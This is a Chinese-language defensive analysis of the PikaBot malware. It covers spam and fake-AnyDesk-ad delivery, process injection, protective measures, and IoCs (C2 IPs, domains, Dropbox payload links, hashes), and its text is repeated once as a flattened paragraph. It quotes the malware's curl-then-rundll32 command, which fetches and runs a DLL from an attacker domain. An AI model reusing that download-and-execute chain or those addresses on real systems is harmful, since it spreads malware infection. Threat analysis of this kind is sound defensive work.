PikaBot恶意软件传播与防御全面分析

1. PikaBot概述

PikaBot是一种新型恶意软件家族，首次发现于2023年，现已成为网络犯罪组织TA577的主要攻击载荷。该恶意软件主要通过两种方式传播：

恶意垃圾邮件活动：最初通过Matanbuchus恶意软件分发
恶意搜索广告：针对Google搜索结果中的特定软件(如AnyDesk)投放虚假广告

2. 传播机制分析

2.1 通过恶意垃圾邮件传播

典型的分发链如下：

攻击者发送包含外部链接的钓鱼邮件(通常使用"劫持线程"技术)
诱导受害者下载包含恶意JavaScript文件的ZIP压缩包

恶意脚本执行以下操作：

"C:\Windows\System32\cmd.exe" /c mkdir C:\Gkooegsglitrg\Dkrogirbksri & curl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll

使用rundll32执行下载的DLL文件：

rundll32 C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll,Enter

将核心模块注入合法的SearchProtocolHost.exe进程

2.2 通过恶意广告传播

攻击流程更为复杂：

攻击者在Google搜索中投放假冒AnyDesk的广告
用户点击后被重定向至诱饵网站(如anadesky[.]ovmv[.]net)
网站执行JavaScript指纹识别，检测是否处于虚拟机环境
展示伪造的下载页面
用户点击下载时进行第二次指纹识别
从Dropbox下载看似合法的MSI安装程序(初始VT检测率为0)

3. 技术特点

进程注入：将核心模块注入SearchProtocolHost.exe
隐蔽技术：
- 使用间接系统调用隐藏注入行为
- 采用数字签名MSI安装程序绕过检测
C2通信：使用多个C2服务器，包括：
- 172[.]232[.]186[.]25
- 57[.]128[.]83[.]12
- 57[.]128[.]164[.]1
- 57[.]128[.]108[.]13
- 139[.]99[.]222[.]29
- 172[.]232[.]164[.]7
- 54[.]37[.]79[.]82
- 172[.]232[.]162[.]198
- 57[.]128[.]109[.]221

4. 防御措施

4.1 企业防护建议

邮件安全：
- 部署高级邮件过滤解决方案
- 教育员工识别钓鱼邮件特征
终端防护：
- 部署EDR/XDR解决方案
- 监控SearchProtocolHost.exe的异常行为
- 限制curl、rundll32等工具的非授权使用
网络防护：
- 阻止已知IoC中的域名和IP
- 监控异常外连流量

4.2 个人防护建议

下载安全：
- 只从官方网站下载软件
- 验证数字签名有效性
- 警惕"太好"的搜索结果
系统安全：
- 保持系统和软件更新
- 使用可靠的安全软件
- 定期扫描系统
行为安全：
- 不点击不明链接
- 不打开可疑附件
- 警惕"紧急"或"重要"的下载请求

5. 检测与响应

5.1 检测指标(IoC)

恶意域名：

anadesky[.]ovmv[.]net
cxtensones[.]top

Dropbox Payload：

dropbox[.]com/scl/fi/3o9baztz08bdw6yts8sft/Installer.msi
dropbox[.]com/scl/fi/p8iup71lu1tiwsyxr909l/Installer.msi
dropbox[.]com/scl/fi/tzq52v1t9lyqq1nys3evj/InstallerKS.msi

文件哈希：

0e81a36141d196401c46f6ce293a370e8f21c5e074db5442ff2ba6f223c435f5
da81259f341b83842bf52325a22db28af0bc752e703a93f1027fa8d38d3495ff
69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320

5.2 响应措施

隔离受感染系统
收集并分析日志
重置受影响凭证
全面扫描网络
更新防护规则

6. 总结

PikaBot代表了当前恶意软件传播的两种主要趋势：利用恶意广告和钓鱼邮件。其技术特点包括：

高度隐蔽的注入技术
多阶段验证的传播链
利用合法服务(Dropbox)托管恶意载荷
针对特定商业软件的精准攻击

防御此类威胁需要多层次的安全策略，结合技术防护和用户教育，才能有效降低感染风险。

PikaBot恶意软件传播与防御全面分析 1. PikaBot概述 PikaBot是一种新型恶意软件家族，首次发现于2023年，现已成为网络犯罪组织TA577的主要攻击载荷。该恶意软件主要通过两种方式传播：恶意垃圾邮件活动：最初通过Matanbuchus恶意软件分发恶意搜索广告：针对Google搜索结果中的特定软件(如AnyDesk)投放虚假广告 2. 传播机制分析 2.1 通过恶意垃圾邮件传播典型的分发链如下：攻击者发送包含外部链接的钓鱼邮件(通常使用"劫持线程"技术) 诱导受害者下载包含恶意JavaScript文件的ZIP压缩包恶意脚本执行以下操作：使用rundll32执行下载的DLL文件：将核心模块注入合法的SearchProtocolHost.exe进程 2.2 通过恶意广告传播攻击流程更为复杂：攻击者在Google搜索中投放假冒AnyDesk的广告用户点击后被重定向至诱饵网站(如anadesky[ .]ovmv[ . ]net) 网站执行JavaScript指纹识别，检测是否处于虚拟机环境展示伪造的下载页面用户点击下载时进行第二次指纹识别从Dropbox下载看似合法的MSI安装程序(初始VT检测率为0) 3. 技术特点进程注入：将核心模块注入SearchProtocolHost.exe 隐蔽技术：使用间接系统调用隐藏注入行为采用数字签名MSI安装程序绕过检测 C2通信：使用多个C2服务器，包括： 172[ .]232[ .]186[ . ]25 57[ .]128[ .]83[ . ]12 57[ .]128[ .]164[ . ]1 57[ .]128[ .]108[ . ]13 139[ .]99[ .]222[ . ]29 172[ .]232[ .]164[ . ]7 54[ .]37[ .]79[ . ]82 172[ .]232[ .]162[ . ]198 57[ .]128[ .]109[ . ]221 4. 防御措施 4.1 企业防护建议邮件安全：部署高级邮件过滤解决方案教育员工识别钓鱼邮件特征终端防护：部署EDR/XDR解决方案监控SearchProtocolHost.exe的异常行为限制curl、rundll32等工具的非授权使用网络防护：阻止已知IoC中的域名和IP 监控异常外连流量 4.2 个人防护建议下载安全：只从官方网站下载软件验证数字签名有效性警惕"太好"的搜索结果系统安全：保持系统和软件更新使用可靠的安全软件定期扫描系统行为安全：不点击不明链接不打开可疑附件警惕"紧急"或"重要"的下载请求 5. 检测与响应 5.1 检测指标(IoC) 恶意域名： anadesky[ .]ovmv[ . ]net cxtensones[ . ]top Dropbox Payload ： dropbox[ . ]com/scl/fi/3o9baztz08bdw6yts8sft/Installer.msi dropbox[ . ]com/scl/fi/p8iup71lu1tiwsyxr909l/Installer.msi dropbox[ . ]com/scl/fi/tzq52v1t9lyqq1nys3evj/InstallerKS.msi 文件哈希： 0e81a36141d196401c46f6ce293a370e8f21c5e074db5442ff2ba6f223c435f5 da81259f341b83842bf52325a22db28af0bc752e703a93f1027fa8d38d3495ff 69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320 5.2 响应措施隔离受感染系统收集并分析日志重置受影响凭证全面扫描网络更新防护规则 6. 总结 PikaBot代表了当前恶意软件传播的两种主要趋势：利用恶意广告和钓鱼邮件。其技术特点包括：高度隐蔽的注入技术多阶段验证的传播链利用合法服务(Dropbox)托管恶意载荷针对特定商业软件的精准攻击防御此类威胁需要多层次的安全策略，结合技术防护和用户教育，才能有效降低感染风险。